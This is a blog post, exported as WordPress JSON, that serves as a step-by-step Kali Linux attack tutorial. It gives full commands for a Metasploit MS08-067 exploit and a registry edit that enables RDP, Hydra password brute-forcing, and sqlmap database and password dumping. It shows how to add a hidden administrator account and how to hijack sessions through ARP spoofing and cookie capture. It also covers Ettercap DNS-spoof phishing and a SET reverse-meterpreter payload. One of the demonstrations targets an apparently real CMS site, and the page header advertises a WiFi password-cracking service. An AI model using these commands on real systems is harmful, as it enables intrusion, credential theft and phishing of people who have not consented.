{"id":345,"date":"2024-03-12T22:11:14","date_gmt":"2024-03-12T14:11:14","guid":{"rendered":"http:\/\/www.ccwifi.cc\/blogs\/?p=345"},"modified":"2024-03-13T15:53:10","modified_gmt":"2024-03-13T07:53:10","slug":"kali-linux%e6%b8%97%e9%80%8f%e5%9f%ba%e7%a1%80%e7%9f%a5%e8%af%86%e6%95%b4%e7%90%862%ef%bc%9a%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8","status":"publish","type":"post","link":"https:\/\/www.ccwifi.cc\/blogs\/2024\/03\/12\/kali-linux%e6%b8%97%e9%80%8f%e5%9f%ba%e7%a1%80%e7%9f%a5%e8%af%86%e6%95%b4%e7%90%862%ef%bc%9a%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8\/","title":{"rendered":"Kali Linux\u6e17\u900f\u57fa\u7840\u77e5\u8bc6\u6574\u7406(2)\uff1a\u6f0f\u6d1e\u5229\u7528"},"content":{"rendered":"<div>\n<p>\u5728\u7ebfwifi\u8dd1\u5305 \u91d1\u521a\u5305\u8dd1\u5305 cap\u8dd1\u5305 hccapx ewsa\u5728\u7ebf \u5c31\u6765 <strong><a href=\"https:\/\/ccwifi.cc\" target=\"_blank\" rel=\"noopener\">\u66f9\u64cdwifi<\/a><\/strong><\/p>\n<p>\u5404\u4f4d\u597d \u53c8\u89c1\u9762\u4e86 \u6211\u662f\u66f9\u64cd \u4eca\u5929\u7ed9\u5927\u5bb6\u5e26\u6765\u4e00\u7bc7\u65b0\u7684\u6559\u7a0b<\/p>\n<p>\u5e0c\u671b\u5404\u4f4d\u7ec6\u5fc3\u5b66\u4e60 \u4f4e\u8c03\u7528\u7f51<\/p>\n<\/div>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_1.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Rank: great Description: MS08-067 Microsoft Server Service Relative Path Stack Corruption Use the &#8220;use&#8221; command to invoke the MS08-067 vulnerability exploit program use exploit\/windows\/smb\/ms08<em>067<\/em>netapi Use the &#8220;show options&#8221; command to view the required settings<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_3.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>From the diagram, it can be seen that the RHOST (target address) and Exploit target need to be set. Use the &#8220;set&#8221; command to set Module Options, in this case, set RHOST 172.16.211.129. After setting, use the &#8220;show options&#8221; command to check the settings<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_4.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>It can be seen that the target IP has been set. Next, set the Exploit target. Use the &#8220;show targets&#8221; command to view the available options. It can be seen that this vulnerability exists in the following versions of the system. Since the demonstrated instance is WinXP SP3 Simplified Chinese version, it is<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_6.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Use the &#8220;set target&#8221; command to set the target, in this case, set target 34. After setting, use the &#8220;show options&#8221; command to check if all settings are completed. Then use the &#8220;exploit&#8221; or &#8220;run&#8221; command to launch the attack. After executing the &#8220;exploit&#8221; command, a meterpreter is obtained<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_7.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">REG<\/span> ADD HKLMSYSTEMCurrentControlSetControlTerminal<span class=\"hljs-string\">\" \"<\/span>Server \/v fDenyTSConnections \/t REG_DWORD \/d <span class=\"hljs-number\">00000000<\/span> \/f<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_8.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_9.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_10.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>In the meterpreter, enter &#8220;shell&#8221; to access the CMD window. Then you can execute CMD commands, such as opening RDP service. Use the &#8220;netstat -an&#8221; command to check if the port is open. From the diagram, it can be seen that it is already open. Then use the &#8220;net user&#8221; command to view the users in the XP system<\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">hydra<\/span> <span class=\"hljs-number\">172.16.211.129<\/span> rdp -l sysorem -P Desktop\/pass.txt<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_11.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs css\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-selector-tag\">rdesktop<\/span> <span class=\"hljs-selector-tag\">-a<\/span> 32 <span class=\"hljs-selector-tag\">-u<\/span> <span class=\"hljs-selector-tag\">sysorem<\/span> <span class=\"hljs-selector-tag\">-p<\/span> 12345 172<span class=\"hljs-selector-class\">.16<\/span><span class=\"hljs-selector-class\">.211<\/span><span class=\"hljs-selector-class\">.129<\/span><span class=\"hljs-selector-pseudo\">:3389<\/span><\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_12.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u <span class=\"hljs-string\">\"<\/span><a href=\"http:\/\/url\/news?id=1\" style=\"background:0px 0px\"><span class=\"hljs-string\">http:\/\/url\/news?id=1<\/span><\/a><span class=\"hljs-string\">\"<\/span> --current-user&nbsp;<\/span><\/code><\/pre>\n<p>It can be seen that there is a user named &#8220;sysorem&#8221;. Then, for a specific user, such as the &#8220;sysorem&#8221; user here, perform a login password brute force. Use Hydra to brute force the password: 12345, then you can directly log in to XP for remote control. SQLmap SQLmap is an automated SQL injection tool that scans, detects, and exploits SQL injection vulnerabilities in a given URL. It currently supports databases such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, and SAP MaxDB. It uses five unique SQL injection techniques: 1) Boolean-based blind injection, which injects based on the true or false condition of the returned page. 2) Time-based blind injection, which cannot determine any information based on the returned page content, but judges by observing the delay in time execution (whether the page return time increases). 3) Error-based injection, which returns error messages or directly displays the results of the injected statement on the page. 4) Union-based injection, which can be used when the union is available. 5) Stacked queries injection, which can execute multiple statements at the same time. Summary: Introduction to commonly used syntax. Demonstration: Intrusion into a server through an injection point. Introduction to commonly used syntax. Get the current username<\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u <span class=\"hljs-string\">\"<\/span><a href=\"http:\/\/www.xxoo.com\/news?id=1\" style=\"background:0px 0px\"><span class=\"hljs-string\">http:\/\/www.xxoo.com\/news?id=1<\/span><\/a><span class=\"hljs-string\">\"<\/span> \u2014current-db<\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u <span class=\"hljs-string\">\"<\/span><a href=\"http:\/\/www.xxoo.com\/news?id=1\" style=\"background:0px 0px\"><span class=\"hljs-string\">http:\/\/www.xxoo.com\/news?id=1<\/span><\/a><span class=\"hljs-string\">\"<\/span> --tables -D \u201cdb_name\u201d<\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u <span class=\"hljs-string\">\"<\/span><a href=\"http:\/\/url\/news?id=1\" style=\"background:0px 0px\"><span class=\"hljs-string\">http:\/\/url\/news?id=1<\/span><\/a><span class=\"hljs-string\">\"<\/span> --columns -T <span class=\"hljs-string\">\"tablename\"<\/span> users-D <span class=\"hljs-string\">\"db_name\"<\/span> -v <span class=\"hljs-number\">0<\/span> <span class=\"hljs-comment\">#<\/span><\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs perl\" style=\", monospace\"><span style=\"font-weight:700\">sqlmap -u <span class=\"hljs-string\">\"<\/span><a href=\"http:\/\/url\/news?id=1\" style=\"background:0px 0px\"><span class=\"hljs-string\">http:\/\/url\/news?id=1<\/span><\/a><span class=\"hljs-string\">\"<\/span> --<span class=\"hljs-keyword\">dump<\/span> -C <span class=\"hljs-string\">\"column_name\"<\/span> -T <span class=\"hljs-string\">\"table_name\"<\/span> -D <span class=\"hljs-string\">\"db_name\"<\/span> -v <span class=\"hljs-number\">0<\/span><\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u <span class=\"hljs-string\">\"<\/span><a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\"><span class=\"hljs-string\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/span><\/a><span class=\"hljs-string\">\"<\/span> --level <span class=\"hljs-number\">2<\/span><\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs sql\" style=\", monospace\"><span style=\"font-weight:700\">news_id=1 UNION ALL <span class=\"hljs-keyword\">SELECT<\/span> <span class=\"hljs-literal\">NULL<\/span>,<span class=\"hljs-literal\">NULL<\/span>,<span class=\"hljs-literal\">NULL<\/span>,<span class=\"hljs-literal\">NULL<\/span>,<span class=\"hljs-literal\">NULL<\/span>,<span class=\"hljs-keyword\">CONCAT<\/span>(<span class=\"hljs-number\">0x716b766271<\/span>,<span class=\"hljs-number\">0x5a794e4d4a626f5857704c4959506c49507a58666b4c44717864664b596d586d797059515752464d<\/span>,<span class=\"hljs-number\">0x716a786b71<\/span>),<span class=\"hljs-literal\">NULL<\/span>,<span class=\"hljs-literal\">NULL<\/span><span class=\"hljs-comment\">-- PHML&amp;classsn=9003<\/span><\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u \u201c<a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/a>\u201d --current-user<\/span><\/code><\/pre>\n<p>Get the current database name. List the table names. List the column fields. Get the field content. Demonstration: Intrusion into a server through an injection point. Target website: a certain CMS. Test for injection. Payload. Query the database owner user, returns &#8220;ht_zhengke20%&#8221;<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_13.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u \u201c<a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/a>\u201d&nbsp; --is-dba&nbsp;<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_14.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u \u201c<a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/a>\u201d --dbs<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_15.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u \u201c<a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/a>\u201d --users<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_16.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u \u201c<a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/a>\u201d --passwords<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_17.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-attribute\">sqlmap<\/span> -u \u201c<a href=\"http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001\" style=\"background:0px 0px\">http:\/\/xxx\/newsInfo.php?news_id=1&amp;classsn=8001<\/a>\u201d --sql-shell<\/span><\/code><\/pre>\n<p>Check if it is an administrator account, returns true. List databases. List database users. List database user passwords. The plaintext password of the &#8220;ht<em>zhengke2&#8243; user is &#8220;ht<\/em>zhengke2&#8243;. Nmap scan discovers port 3389 is open. Enter SQL shell<\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs nginx\" style=\", monospace\"><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_18.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>In the SQL shell, add a user and elevate to administrator. net user root 12345 \/add net localgroup administrators root \/add Use the newly added user to remotely log in to the server<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_19.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Arpspoof In a local area network, network traffic is not transmitted based on IP addresses but based on MAC addresses. Therefore, if the MAC address on A is forged as a nonexistent MAC address, it will cause network interruption, and A cannot ping C. This is a simple ARP spoofing, exploiting the vulnerability of the ARP protocol. It is often used in internal network penetration, and can be combined with other tools for network sniffing, traffic hijacking, etc.<\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs css\" style=\", monospace\"><span class=\"hljs-selector-tag\" style=\"font-weight:bold\">arpspoof<\/span> <span class=\"hljs-selector-attr\">[-i interface]<\/span> <span class=\"hljs-selector-attr\">[-t target]<\/span> <span class=\"hljs-selector-tag\" style=\"font-weight:bold\">host<\/span><\/code><\/pre>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs dts\" style=\", monospace\"><span style=\"font-weight:700\">echo <span class=\"hljs-number\">1<\/span> &gt;&gt; <span class=\"hljs-meta-keyword\">\/proc\/<\/span>sys<span class=\"hljs-meta-keyword\">\/net\/<\/span>ipv4\/ip_forward<\/span><\/code><\/pre>\n<p>Example application: ARP spoofing attack and session hijacking. ARP network interruption attack. Command structure: -i for network card, -t for target. ARP spoofing attack. Windows XP SP3 IP: 172.16.211.129 Kali Linux IP: 172.16.211.128 Gateway IP: 172.16.211.2 Enable IP forwarding (can use &#8220;cat&#8221; to check if it is set successfully)<\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs css\" style=\", monospace\"><span style=\"font-weight:700\"><span class=\"hljs-selector-tag\">arpspoof<\/span> &nbsp; <span class=\"hljs-selector-tag\">-i<\/span> &nbsp; <span class=\"hljs-selector-tag\">eth0<\/span> &nbsp; <span class=\"hljs-selector-tag\">-t<\/span>&nbsp; 172<span class=\"hljs-selector-class\">.16<\/span><span class=\"hljs-selector-class\">.211<\/span><span class=\"hljs-selector-class\">.129<\/span> &nbsp; 172<span class=\"hljs-selector-class\">.16<\/span><span class=\"hljs-selector-class\">.211<\/span><span class=\"hljs-selector-class\">.2<\/span><\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_20.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_22.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Redirect victim&#8217;s traffic to the attacker. Capture packets with tcpdump (can also use Wireshark). Since the gateway has routing capabilities, capturing local network card traffic can obtain the target host&#8217;s traffic. Simple usage: tcpdump -w cookie.cap # Capture all traffic and write to cookie.cap. Perform ARP spoofing for a period of time, during which you can browse web pages, chat, etc. For example, now access &#8220;\u6570\u5b57\u676d\u7535&#8221; (a website), stop spoofing and packet capture after a period of time, and use ferret to process the captured traffic. Simple usage: ferret -r cookie.cap # Process the captured traffic<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_24.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_25.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Hamster After ensuring that the processed cookie.cap is in the root user&#8217;s directory, run hamster. Then set the browser proxy according to the prompts. Set the proxy for the built-in Firefox browser in Kali as shown in the diagram. After setting the proxy, access hamster or :1234 in the browser<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_26.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<pre style=\", monospace;font-size:13px;line-height:1.42857\"><code class=\"hljs css\" style=\", monospace\"><span class=\"hljs-selector-tag\" style=\"font-weight:bold\">arpspoof<\/span> &nbsp; <span class=\"hljs-selector-tag\" style=\"font-weight:bold\">-i<\/span> &nbsp; <span class=\"hljs-selector-tag\" style=\"font-weight:bold\">eth0<\/span> &nbsp; 172<span class=\"hljs-selector-class\">.16<\/span><span class=\"hljs-selector-class\">.211<\/span><span class=\"hljs-selector-class\">.1<\/span> &nbsp; 172<span class=\"hljs-selector-class\">.16<\/span><span class=\"hljs-selector-class\">.211<\/span><span class=\"hljs-selector-class\">.128<\/span><\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_27.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Click on the left link, and the cookie hijacking is successful, achieving access. ARP network interruption attack. Disable local IP forwarding, so when the traffic from the gateway reaches the local machine, the target machine cannot receive data from the gateway, resulting in &#8220;network interruption&#8221;. Ettercap Ettercap is a powerful tool for deception, allowing testers to create and send forged packets, from network adapters to application software at various levels, and bind listening data to a local port, etc. It is a commonly used auxiliary tool in man-in-the-middle attacks.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_28.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Without further ado, interested friends can explore it themselves. Example demonstration: DNS spoofing (phishing) using MIMT. Configure DNS (\/etc\/ettercap\/etter.dns). 172.16.211.128 is the local LAN address.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_30.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_31.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_32.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_33.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Enable local web service. Direct access will return the default Apache page. Use the command &#8220;ettercap -G&#8221; to start ettercap and select &#8220;Unifind sniffing&#8221; for NIC configuration. Then scan for live hosts and click on &#8220;Hosts list&#8221; in the diagram.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_34.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_35.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_36.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_37.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Add the gateway address to target1 and add the attack target to target2. Then set the form of man-in-the-middle attack as ARP spoofing and set bidirectional spoofing. Then enable the dns_spoof plugin. Then start DNS spoofing. When browsing on the target host, the spoofing effect can be achieved.<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_38.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>DNS spoofing is often used in internal network penetration to obtain administrator information, phishing, etc. For example, it can forge the internal network router management page and deceive users into entering real account passwords. SET SET is a toolkit that utilizes social engineering theory. It connects with Metasploit and automatically builds various environments applicable to social engineering techniques, such as the latest Microsoft vulnerabilities, Adobe PDF vulnerabilities, Java Applet vulnerabilities, etc. It is not only easy to use but also cleverly deceives ordinary users&#8217; eyes. Therefore, it is an extremely dangerous tool. Enter &#8220;setoolkit&#8221; in the shell to start SET, which can be used for social engineering, penetration testing, etc. Here, select 1 for social engineering<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_39.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_40.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_42.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><\/p>\n<p>Choose connection method 4 and create a payload and listener. Because the system used for demonstration is WinXP 32-bit, select connection method 2. Then set the local IP and port (set the port to 4445 here to avoid conflicts). Then SET will start MSF and use the set payloads. When the user is lured and reversely connects to port 4445 on this machine, a meterpreter will be obtained. After obtaining the meterpreter, you can enter &#8220;?&#8221; to view available commands<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/s1sql1tew.hb-bkt.clouddn.com\/photos\/20240312\/d4bd497b959558899f41e3a8fce09e72_44.jpg\" alt=\"arp\u65ad\u7f51\u653b\u51fbkali\"><!-- \u6587\u7ae0\u6765\u6e90:https:\/\/blog.csdn.net\/wz_cow\/article\/details\/80933089 --><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kali Linux\u6e17\u900f\u57fa\u7840\u77e5\u8bc6\u6574\u7406(2)\uff1a\u6f0f\u6d1e\u5229\u7528Rank\uff1agreatDescription\uff1aMS08-<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"topic":[],"class_list":["post-345","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/comments?post=345"}],"version-history":[{"count":1,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/345\/revisions"}],"predecessor-version":[{"id":423,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/posts\/345\/revisions\/423"}],"wp:attachment":[{"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/media?parent=345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/categories?post=345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/tags?post=345"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.ccwifi.cc\/blogs\/wp-json\/wp\/v2\/topic?post=345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}